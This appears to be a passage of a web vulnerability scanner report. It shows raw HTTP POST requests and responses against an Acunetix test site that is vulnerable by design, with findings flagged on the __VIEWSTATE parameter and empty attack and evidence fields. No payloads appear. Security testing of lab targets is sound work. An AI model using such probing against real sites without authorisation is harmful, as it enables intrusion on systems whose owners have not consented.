Request Body - size: 1,061 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8367&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIAuftPQ2ghkZGRYNdkjwXcn5WDYklXAchL1uVWfew%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKkyIHJBQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6dnDpVnXdwpd2o5095x7%2FTwGgd
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:20 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIAuftPQ2ghkZGRYNdkjwXcn5WDYklXAchL1uVWfew==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKkyIHJBQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE6dnDpVnXdwpd2o5095x7/TwGgd" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:White" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8375&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIB80RzX2ghkZGS%2BPNBhjEJe8NjYfvgc8u0VAWn7RA%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKZx5HtAwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBCL%2BbSIzu5TpF4lfJmpkEm7KjQIt
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:21 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIB80RzX2ghkZGS+PNBhjEJe8NjYfvgc8u0VAWn7RA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZx5HtAwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBCL+bSIzu5TpF4lfJmpkEm7KjQIt" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:White" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
